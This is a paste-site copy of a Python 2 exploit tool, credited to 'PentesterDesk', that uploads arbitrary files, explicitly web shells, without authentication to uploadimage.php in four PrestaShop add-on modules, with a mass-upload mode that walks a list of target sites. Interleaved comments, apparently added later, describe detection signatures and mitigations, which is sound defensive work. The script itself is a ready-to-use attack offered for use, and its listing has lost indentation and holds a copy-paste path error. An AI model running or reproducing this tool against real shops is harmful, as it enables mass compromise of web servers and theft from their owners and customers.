a guest
Jan 17th, 2019
  1. #!/usr/bin/python
  2. ####################################################################################
  3. tunisia hacker
  4. ####################################################################################
  5. import sys, os
  6. import time
  7. import requests
  # Interactive entry menu of a Python 2 script (print statements, raw_input).
  # It prints a banner, lists four PrestaShop add-on modules and stores the
  # operator's choice in ch1. Each later branch sends a file to that module's
  # uploadimage.php endpoint.
  # The "N." prefixes are paste-site line numbers and the original indentation
  # is lost, so the listing is not valid Python as displayed.
  8. def main():
  # `'cls' and 'color -a'` evaluates to 'color -a', so on Windows this runs
  # `color -a` rather than `cls`; other platforms run `clear`.
  9. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  10.  
  11. banner = '''
  12.  
  13. +======================================================+
  14. | Prestashop | FileUpload Exp | PentesterDesk |
  15. | Found by : Muhammad Faisal Gunanda |
  16. | Coded by : PentesterDesk Team |
  17. | Contact : pentesterdesk@gmail.com |
  18. +======================================================+
  19. '''
  20. print banner
  # The four module names below are the directories under /modules/ that a
  # shop owner should inventory: simpleslideshow, productpageadverts,
  # homepageadvertise, columnadverts.
  21. print "[1] SimpleSlideShow "
  22. print "[2] Productpageadverts"
  23. print "[3] HomepageAdvertise"
  24. print "[4] columnAdverts"
  25. ch1=raw_input("\n[>] ")
  # Menu option 1: the `simpleslideshow` module. A second prompt (ch2) selects
  # a single URL, a list of URLs read from a file, or a return to the menu by
  # calling main() again.
  26. #1 SimpleSlideShow
  27. if ch1 == '1':
  28. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  29. print banner
  30. print "\n <==============SimpleSlideShow Exploit=================>\n"
  31. print "[1] Single Site "
  32. print "[2] Mass Upload"
  33. print "[3] GoTo Home"
  34. ch2=raw_input("\n[>] ")
  35. if ch2 == '3':
  36. main()
  37. if ch2 == '1':
  38. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  39. print banner
  40. print "\n <==============SimpleSlideShow Exploit=================>\n"
  41. url = raw_input("[+] Enter Url : ")
  42. filname= raw_input("[+] Enter File : ")
  43. if filname == '' or url == '':
  44. print "\n[!] Url or File is not entered\n"
  45. raw_input("[+] Enter Any key to try agian [>] ")
  46. main()
  # The request target is derived from the entered URL and addresses
  # uploadimage.php under /modules/simpleslideshow/.
  47. #url Logic
  48. if '/modules/simpleslideshow/' in url:
  49. url=url.replace('/modules/simpleslideshow/','/modules/simpleslideshow/uploadimage.php')
  50. elif '/modules/simpleslideshow/uploadimage.php' in url:
  51. url=url
  52. else:
  53. url = url + "/modules/simpleslideshow/uploadimage.php"
  54. #main
  # Detection: the file is sent as a multipart POST in the form field
  # `userfile`, and the file part itself is labelled with the content type
  # 'multipart/form-data' (third tuple element), which a browser upload would
  # not produce. No cookies, credentials or custom headers are passed, so the
  # request carries the requests library's default User-Agent and relies on the
  # endpoint accepting uploads without a session.
  55. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  56. req=requests.post(url,files=files)
  # The script treats HTTP 200 or the word 'success' in the body as a hit and
  # prints the location it expects the file at: .../simpleslideshow/slides/<name>.
  # NOTE(review): the slides/ storage path is the script's assumption; confirm
  # against the module. A 200 in the access log alone does not prove a write,
  # so triage should check slides/ on disk for unexpected files.
  # Mitigation: remove or update the module, require an authenticated admin
  # session on uploadimage.php, validate file type server-side, and disable
  # script execution in the slides/ directory.
  57. if req.status_code == 200 or 'success' in req.text:
  58. url=url.replace('/uploadimage.php','/slides/'+filname)
  59. print ("[+] %s [ok]" % (url))
  60. else:
  61. print "\n[+] %s \n" %url
  62. raw_input("\n[+] Press Enter [>] ")
  63. main()
  # List mode: one site per line is read from a file and the same POST is
  # repeated for each. The second prompt asks for a "Shell Name", i.e. the
  # uploaded file is expected to be a server-side script, which is why blocking
  # execution in the upload directory matters.
  64. #Mass upload Logic
  65. if ch2 == '2':
  66. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  67. print banner
  68. print "\n <==============SimpleSlideShow Exploit=================>\n"
  69. filee = raw_input("[+] Enter List Name : ")
  70. filname= raw_input("[+] Enter Shell Name : ")
  71. if filname == '' or filee == '':
  72. print "\n[!] Url or File is not entered\n"
  73. raw_input("[+] Enter Any key to try agian [>] ")
  74. main()
  75. ob = open(filee,'r')
  76. lists = ob.readlines()
  77. list1 = []
  78. i = 0
  79. for i in range(len(lists)):
  80. list1.append(lists[i].strip('\n'))
  81.  
  82. count = 0
  83. for site in (list1):
  84. count = count + 1
  85. if '/modules/simpleslideshow/' in site:
  86. url=site.replace('/modules/simpleslideshow/','/modules/simpleslideshow/uploadimage.php')
  87. elif '/modules/simpleslideshow/uploadimage.php' in site:
  88. url=site
  89. else:
  90. url = site + "/modules/simpleslideshow/uploadimage.php"
  # Same request shape as single-site mode: field `userfile`, no
  # authentication material, default client headers.
  91. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  92. req=requests.post(url,files=files)
  93. if req.status_code == 200 or 'success' in req.text:
  94. url=url.replace('/uploadimage.php','/slides/'+filname)
  95. print ("[%d] %s [ ok ]" % (count,url))
  96. else:
  97. print ("[%d] %s " % (count,url))
  98. raw_input("\n[+] Press Enter [>] ")
  99. main()
  100.  
  # Menu option 2: the `productpageadverts` module. The flow matches the other
  # options: a sub-menu (ch2) for a single URL, a list file, or back to main().
  101. #2 productpageadverts
  102. if ch1 == '2':
  103. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  104. print banner
  105. print "\n <==============Productpageadverts Exploit==============>\n"
  106. print "[1] Single Site "
  107. print "[2] Mass Upload"
  108. print "[3] GoTo Home"
  109. ch2=raw_input("\n[>] ")
  110. if ch2 == '3':
  111. main()
  112. if ch2 == '1':
  113. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  114. print banner
  115. print "\n <==============Productpageadverts Exploit==============>\n"
  116. url = raw_input("[+] Enter Url : ")
  117. filname= raw_input("[+] Enter File : ")
  118. if filname == '' or url == '':
  119. print "\n[!] Url or File is not entered\n"
  120. raw_input("[+] Enter Any key to try agian [>] ")
  121. main()
  # The request target is derived from the entered URL and addresses
  # uploadimage.php under /modules/productpageadverts/.
  122. #url Logic
  123. if '/modules/productpageadverts/' in url:
  124. url=url.replace('/modules/productpageadverts/','/modules/productpageadverts/uploadimage.php')
  125. elif '/modules/productpageadverts/uploadimage.php' in url:
  126. url=url
  127. else:
  128. url = url + "/modules/productpageadverts/uploadimage.php"
  129. #main
  # Detection: unauthenticated multipart POST, form field `userfile`, file part
  # labelled 'multipart/form-data', no cookies or custom headers. Log and WAF
  # rules can key on POSTs to /modules/productpageadverts/uploadimage.php that
  # arrive without an admin session.
  130. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  131. req=requests.post(url,files=files)
  # A hit is reported on HTTP 200 or 'success' in the body; the printed URL is
  # the expected location .../productpageadverts/slides/<name>.
  # NOTE(review): storage under slides/ is assumed by the script; confirm
  # against the module and check that directory on disk during triage.
  # Mitigation: remove or update the module, gate the endpoint behind admin
  # authentication, and disable script execution in slides/.
  132. if req.status_code == 200 or 'success' in req.text:
  133. url=url.replace('/uploadimage.php','/slides/'+filname)
  134. print ("[+] %s [ ok ]" % (url))
  135. else:
  136. print "\n\[+] %s \n" %url
  137. raw_input("\n[+] Press Enter [>] ")
  138. main()
  # List mode: reads one site per line from a file and repeats the POST.
  # The \033[...m sequences in the prompts are ANSI colour codes only.
  139. #Mass upload Logic
  140. if ch2 == '2':
  141. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  142. print banner
  143. print "\n <==============Productpageadverts Exploit==============>\n"
  144. filee = raw_input("\033[1;36m[+] Enter List Name : \033[1;m")
  145. filname= raw_input("\033[1;36m[+] Enter Shell Name : \033[1;m")
  146. if filname == '' or filee == '':
  147. print "\n\033[1;41m[!] Url or File is not entered\033[1;m\n"
  148. raw_input("\033[1;36m[+] Enter Any key to try agian \033[1;m[\033[1;31m>\033[1;m] ")
  149. main()
  150. ob = open(filee,'r')
  151. lists = ob.readlines()
  152. list1 = []
  153. i = 0
  154. for i in range(len(lists)):
  155. list1.append(lists[i].strip('\n'))
  156.  
  157. count = 0
  158. for site in (list1):
  159. count = count + 1
  160. if '/modules/productpageadverts/' in site:
  161. url=site.replace('/modules/productpageadverts/','/modules/productpageadverts/uploadimage.php')
  162. elif '/modules/simpleslideshow/uploadimage.php' in site:
  163. url=site
  164. else:
  165. url = site + "/modules/productpageadverts/uploadimage.php"
  # Same request shape as single-site mode: field `userfile`, no
  # authentication material, default client headers.
  166. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  167. req=requests.post(url,files=files)
  168. if req.status_code == 200 or 'success' in req.text:
  169. url=url.replace('/uploadimage.php','/slides/'+filname)
  170. print ("[%d] %s [ ok ]" % (count,url))
  171. else:
  172. print ("[%d] %s " % (count,url))
  173. raw_input("\n[+] Press Enter [>] ")
  174. main()
  # Menu option 3: the `homepageadvertise` module. The flow matches the other
  # options: a sub-menu (ch2) for a single URL, a list file, or back to main().
  175. #3 homepageadvertise
  176. if ch1 == '3':
  177. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  178. print banner
  179. print "\n <==============HomePageAdvertise Exploit===============>\n"
  180. print "[1] Single Site "
  181. print "[2] Mass Upload"
  182. print "[3] GoTo Home"
  183. ch2=raw_input("\n[>] ")
  184. if ch2 == '3':
  185. main()
  186. if ch2 == '1':
  187. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  188. print banner
  189. print "\n <==============HomePageAdvertise Exploit===============>\n"
  190. url = raw_input("[+] Enter Url : ")
  191. filname= raw_input("[+] Enter File : ")
  192. if filname == '' or url == '':
  193. print "\n\033[1;41m[!] Url or File is not entered\033[1;m\n"
  194. raw_input("\033[1;36m[+] Enter Any key to try agian \033[1;m[\033[1;31m>\033[1;m] ")
  195. main()
  # The request target is derived from the entered URL and addresses
  # uploadimage.php under /modules/homepageadvertise/.
  196. #url Logic
  197. if '/modules/homepageadvertise/' in url:
  198. url=url.replace('/modules/homepageadvertise/','/modules/homepageadvertise/uploadimage.php')
  199. elif '/modules/homepageadvertise/uploadimage.php' in url:
  200. url=url
  201. else:
  202. url = url + "/modules/homepageadvertise/uploadimage.php"
  203. #main
  # Detection: unauthenticated multipart POST, form field `userfile`, file part
  # labelled 'multipart/form-data', no cookies or custom headers. Log and WAF
  # rules can key on POSTs to /modules/homepageadvertise/uploadimage.php that
  # arrive without an admin session.
  204. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  205. req=requests.post(url,files=files)
  # A hit is reported on HTTP 200 or 'success' in the body; the printed URL is
  # the expected location .../homepageadvertise/slides/<name>.
  # NOTE(review): storage under slides/ is assumed by the script; confirm
  # against the module and check that directory on disk during triage.
  # Mitigation: remove or update the module, gate the endpoint behind admin
  # authentication, and disable script execution in slides/.
  206. if req.status_code == 200 or 'success' in req.text:
  207. url=url.replace('/uploadimage.php','/slides/'+filname)
  208. print ("[+] %s [ ok ]" % (url))
  209. else:
  210. print "\n[+] %s \n" %url
  211. raw_input("\n[+] Press Enter [>] ")
  212. main()
  # List mode: reads one site per line from a file and repeats the POST.
  213. #Mass upload Logic
  214. if ch2 == '2':
  215. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  216. print banner
  217. print "\n <==============HomePageAdvertise Exploit===============>\n"
  218. filee = raw_input("[+] Enter List Name : ")
  219. filname= raw_input("[+] Enter Shell Name : ")
  220. if filname == '' or filee == '':
  221. print "\n\[!] Url or File is not entered\n"
  222. raw_input("[+] Enter Any key to try agian [>] ")
  223. main()
  224. ob = open(filee,'r')
  225. lists = ob.readlines()
  226. list1 = []
  227. i = 0
  228. for i in range(len(lists)):
  229. list1.append(lists[i].strip('\n'))
  230.  
  231. count = 0
  232. for site in (list1):
  233. count = count + 1
  234. if '/modules/homepageadvertise/' in site:
  235. url=site.replace('/modules/homepageadvertise/','/modules/homepageadvertise/uploadimage.php')
  236. elif '/modules/homepageadvertise/uploadimage.php' in site:
  237. url=site
  238. else:
  239. url = site + "/modules/homepageadvertise/uploadimage.php"
  # Same request shape as single-site mode: field `userfile`, no
  # authentication material, default client headers.
  240. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  241. req=requests.post(url,files=files)
  242. if req.status_code == 200 or 'success' in req.text:
  243. url=url.replace('/uploadimage.php','/slides/'+filname)
  244. print ("[%d]] %s [ ok ]" % (count,url))
  245. else:
  246. print ("[%d] %s " % (count,url))
  247. raw_input("\n[+] Press Enter [>] ")
  248. main()
  # Menu option 4: the `columnadverts` module. The flow matches the other
  # options: a sub-menu (ch2) for a single URL, a list file, or back to main().
  249. #4 columnadverts
  250. if ch1 == '4':
  251. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  252. print banner
  253. print "\n <================ColumnAdvers Exploit==================>\n"
  254. print "[1] Single Site "
  255. print "[2] Mass Upload"
  256. print "[3] GoTo Home"
  257. ch2=raw_input("\n[>] ")
  258. if ch2 == '3':
  259. main()
  260. if ch2 == '1':
  261. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  262. print banner
  263. print "\n <================ColumnAdvers Exploit==================>\n"
  264. url = raw_input("[+] Enter Url : ")
  265. filname= raw_input("[+] Enter File : ")
  266. if filname == '' or url == '':
  267. print "\n[!] Url or File is not entered\n"
  268. raw_input("[+] Enter Any key to try agian [>] ")
  269. main()
  # The request target is derived from the entered URL and addresses
  # uploadimage.php under /modules/columnadverts/.
  270. #url Logic
  271. if '/modules/columnadverts/' in url:
  272. url=url.replace('/modules/columnadverts/','/modules/columnadverts/uploadimage.php')
  273. elif '/modules/columnadverts/uploadimage.php' in url:
  274. url=url
  275. else:
  276. url = url + "/modules/columnadverts/uploadimage.php"
  277. #main
  # Detection: unauthenticated multipart POST, form field `userfile`, file part
  # labelled 'multipart/form-data', no cookies or custom headers. Log and WAF
  # rules can key on POSTs to /modules/columnadverts/uploadimage.php that
  # arrive without an admin session.
  278. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  279. req=requests.post(url,files=files)
  # A hit is reported on HTTP 200 or 'success' in the body; the printed URL is
  # the expected location .../columnadverts/slides/<name>.
  # NOTE(review): storage under slides/ is assumed by the script; confirm
  # against the module and check that directory on disk during triage.
  # Mitigation: remove or update the module, gate the endpoint behind admin
  # authentication, and disable script execution in slides/.
  280. if req.status_code == 200 or 'success' in req.text:
  281. url=url.replace('/uploadimage.php','/slides/'+filname)
  282. print ("[+] %s [ ok ]" % (url))
  283. else:
  284. print "\n[+] %s \n" %url
  285. raw_input("\n[+] Press Enter [>] ")
  286. main()
  # List mode: reads one site per line from a file and repeats the POST.
  287. #Mass upload Logic
  288. if ch2 == '2':
  289. os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
  290. print banner
  291. print "\n <================ColumnAdvers Exploit==================>\n"
  292. filee = raw_input("[+] Enter List Name : ")
  293. filname= raw_input("[+] Enter Shell Name : ")
  294. if filname == '' or filee == '':
  295. print "\n[!] Url or File is not entered\n"
  296. raw_input("[+] Enter Any key to try agian [>] ")
  297. main()
  298. ob = open(filee,'r')
  299. lists = ob.readlines()
  300. list1 = []
  301. i = 0
  302. for i in range(len(lists)):
  303. list1.append(lists[i].strip('\n'))
  304.  
  305. count = 0
  306. for site in (list1):
  307. count = count + 1
  308. if '/modules/columnadverts/' in site:
  309. url=site.replace('/modules/columnadverts/','/modules/columnadverts/uploadimage.php')
  310. elif '/modules/columnadverts/uploadimage.php' in site:
  311. url=site
  312. else:
  313. url = site + "/modules/columnadverts/uploadimage.php"
  # Same request shape as single-site mode: field `userfile`, no
  # authentication material, default client headers.
  314. files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
  315. req=requests.post(url,files=files)
  316. if req.status_code == 200 or 'success' in req.text:
  317. url=url.replace('/uploadimage.php','/slides/'+filname)
  318. print ("[%d] %s [ ok ]" % (count,url))
  319. else:
  320. print ("[%d] %s " % (count,url))
  321. raw_input("\n[+] Press Enter [>] ")
  322. main()
  # Starts the interactive menu only when the file is executed directly, not
  # when it is imported.
  323. if __name__ == "__main__":
  324. main()
  325.  
  326. # love you #